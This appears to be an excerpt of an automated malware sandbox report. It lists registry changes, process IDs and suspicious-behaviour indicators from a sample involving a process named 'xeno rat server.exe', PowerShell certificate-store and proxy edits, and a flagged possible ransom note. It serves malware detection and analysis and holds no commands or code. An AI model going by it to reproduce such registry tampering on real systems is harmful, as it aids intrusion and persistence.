Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe

Modifies registry class 64 IoCs

Processes:

Explorer.EXExeno rat server.exesihost.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 = 7200930c0000000000000000000000000000000000000000000000000000000010000100300032002f00310034002f00320030003200340020002000310039003a00310038003a00310032000000000004010000070000000000000070006c007500670069006e00730000000000000000000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).y = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\NodeSlot = "9"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff	xeno rat server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	xeno rat server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874369"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	xeno rat server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0	xeno rat server.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	xeno rat server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{885A186E-A440-4ADA-812B-DB871B942259}	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 000000000100000002000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1102"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874385"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).x = "4294967295"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "3"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874385"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\NodeSlot = "5"	xeno rat server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	xeno rat server.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = 00000000ffffffff	xeno rat server.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 = 8a00320007730400d15841642000464f52544e497e312e5a495000006e0009000400efbed1584164d15841642e000000000000000000000000000000000000000000000000006eb2790046006f00720074006e00690074006500450078007400650072006e0061006c00430068006500610074002d006d00610069006e002e007a006900700000001c000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f80cb859f6720028040b29b5540cc05aab60000	Explorer.EXE

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

10780 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1224 NOTEPAD.EXE
Suspicious behavior: AddClipboardFormatListener 4 IoCs

Processes:

Explorer.EXE

pid process

3460 Explorer.EXE
3460 Explorer.EXE
3460 Explorer.EXE
3460 Explorer.EXE

pid	process
10780	reg.exe

pid	process
1224	NOTEPAD.EXE

pid	process
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemain.exeUpdate.exepowershell.exepowershell.exe

pid	process
4364	chrome.exe
4364	chrome.exe
7116	chrome.exe
7116	chrome.exe
4980	powershell.exe
4980	powershell.exe
3884	powershell.exe
3884	powershell.exe
6432	powershell.exe
6432	powershell.exe
3880	powershell.exe
3880	powershell.exe
4980	powershell.exe
4980	powershell.exe
7104	powershell.exe
7104	powershell.exe
6676	powershell.exe
6676	powershell.exe
6676	powershell.exe
3884	powershell.exe
7104	powershell.exe
6432	powershell.exe
3880	powershell.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
6772	main.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
5680	Update.exe
11612	powershell.exe
11612	powershell.exe
5272	powershell.exe
5272	powershell.exe
5680	Update.exe
5680	Update.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

Processes:

Explorer.EXEtaskhostw.exexeno rat server.exeUpdate.exe

pid process

3460 Explorer.EXE
2820 taskhostw.exe
1952 xeno rat server.exe
5680 Update.exe

pid	process
3460	Explorer.EXE
2820	taskhostw.exe
1952	xeno rat server.exe
5680	Update.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

Processes:

chrome.exechrome.exechrome.exe

pid	process
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
5400	chrome.exe
2124	chrome.exe
2124	chrome.exe
2124	chrome.exe
2124	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe
Token: SeShutdownPrivilege	4364	chrome.exe
Token: SeCreatePagefilePrivilege	4364	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
